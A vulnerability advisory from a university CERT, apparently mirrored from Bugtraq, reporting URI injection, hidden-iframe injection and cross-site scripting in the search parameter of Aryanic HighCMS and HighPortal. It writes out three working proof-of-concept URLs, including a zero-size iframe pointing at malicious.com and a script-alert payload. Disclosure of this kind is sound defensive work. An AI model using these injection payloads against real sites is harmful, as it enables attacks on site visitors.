Aryanic HighCMS and HighPortal multiple Vulnerabilities

From: mr.faghani@gmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: Aryanic HighCMS and HighPortal multiple Vulnerabilities
Date:


================= IUT-CERT =================

 Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities
        
 Vendor: www.aryanic.com
 Vulnerable Version: 10 and priors
 Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS)
 Fix: N/A

================== nsec.ir =================

Description:
------------------

    Aryanic is the leading CMS producer in Iran. Search page in HighCMS and HighPortal
    products are vulnerable to multiple input validation vulnerabilities.



Vulnerability Variant:
------------------

     1- URI Injection "/web_search.aspx" in "q" parameter.
     http://example.com/includes/web_search.aspx?id=1&q="<a href="http://www.malicious.com">clickme</a>
    
      2- iFrame Injection "/web_search.aspx" in "q" parameter.
  http://example.com/includes/web_search.aspx?id=1&q="iframe src ="http://www.malicious.com" width="0" height="0"></iframe>

    3- Cross Site Scripting "/web_search.aspx" in "q" parameter.
      http://example.com/includes/web_search.aspx?id=1&q="<script>alert(12345)</script>



Solution:
------------------

                Input validation of Parameter "q" should be corrected.


Credit: 
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N.Fathi, M. R. Faghani







Copyright © 1995-2020 LinuxRocket.net. All rights reserved.